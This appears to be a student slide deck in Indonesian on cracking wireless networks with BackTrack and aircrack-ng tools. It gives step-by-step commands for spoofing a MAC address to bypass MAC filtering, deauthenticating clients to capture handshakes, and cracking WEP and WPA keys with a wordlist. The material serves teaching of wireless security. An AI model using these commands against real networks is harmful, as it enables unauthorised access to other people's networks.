Cracking MAC WEP WPA Kelompok 10 1 Yopi

  • Slides: 10
Download presentation
Cracking MAC, WEP & WPA

Cracking MAC, WEP & WPA

Kelompok 10 1. Yopi Danis Irawan (07523189) 2. Budi Purnomo S (07523291) 3. Nurirwan

Kelompok 10 1. Yopi Danis Irawan (07523189) 2. Budi Purnomo S (07523291) 3. Nurirwan Saputra (07523322) 4. Willy Wize Ananda(07523349)

Sedikit penjelasan…. • MAC Filtering • WEP • WPA

Sedikit penjelasan…. • MAC Filtering • WEP • WPA

Perangkat yang digunakan Backtrack 4 : salah satu distro linux (Download: http: //www. remote-exploit.

Perangkat yang digunakan Backtrack 4 : salah satu distro linux (Download: http: //www. remote-exploit. org ) Airmon-ng : detect, manage wireless card Airodump-ng : scanning wireless card Aireplay-ng : arp request, flooding Aircrack-ng : decrypt key

Tujuan yang diharapkan 1. 2. 3. 4. Melakukan manipulasi MAC Filtering Cracking WEP key

Tujuan yang diharapkan 1. 2. 3. 4. Melakukan manipulasi MAC Filtering Cracking WEP key Cracking WPA Penanganan keamanan

Langkah Kerja 1 Manipulasi Mac filtering 1. Wireless Device identifikasi Airmon-ng 2. Menonaktifkan interface

Langkah Kerja 1 Manipulasi Mac filtering 1. Wireless Device identifikasi Airmon-ng 2. Menonaktifkan interface wireless card Airmon-ng stop [interfece] 3. Mengganti mac address macchanger --mac 11: 22: 33: 44: 55: 66 [device] 4. Melihat mac address yang sudah terganti if config -a

Let’s do it • Tutorial bisa dilihat di http: //thew 0 rd. com/2008/08/19/tutorial-crackingwep-using-backtrack-3/ •

Let’s do it • Tutorial bisa dilihat di http: //thew 0 rd. com/2008/08/19/tutorial-crackingwep-using-backtrack-3/ • kita juga dapat menggunakan aplikasi bernama k-mac untuk memanipulasi mac www. neset. com

Cracking WEP key • Aktifkan mode monitor Airmon-ng start [device] • Jalankan Airodump-ng (scanning

Cracking WEP key • Aktifkan mode monitor Airmon-ng start [device] • Jalankan Airodump-ng (scanning wireless card) airodump-ng --channel X --write nama_file_capture interface • Jalankan aireplay (arp request, flooding) aireplay-ng --deauth X –a BSSID_akses_point -c Mac Address target interface • Jalankan aircrack-ng (decrypt key) $ aircrack-ng nama_file_capture. cap

Let's crack it! • Tutorial bisa dilihat di http: //thew 0 rd. com/2008/08/19/tutorialcracking-wep-using-backtrack-3/

Let's crack it! • Tutorial bisa dilihat di http: //thew 0 rd. com/2008/08/19/tutorialcracking-wep-using-backtrack-3/

Cracking WPA key 1. 2. 3. 4. 5. 6. Wireless Device identifikasi #airmon-ng Hidupkan

Cracking WPA key 1. 2. 3. 4. 5. 6. Wireless Device identifikasi #airmon-ng Hidupkan Mode Monitor #airmon-ng stop [interface] (menghapus modus monitor) #airmon-ng start [interface] (mulai mode monitor) Siapa yang online? #airodump-ng -w nama_file [interface] Pilih musuh # airodump-ng --channel X --write nama_file_capture [interface] Menunggu Handshake! # aireplay-ng -0 1 -a [Ap_Mac]-c [Mac_Client] [interface] Crack kuncinya! # aircrack-ng -0 –x 2 - w Kamus File FILE. cap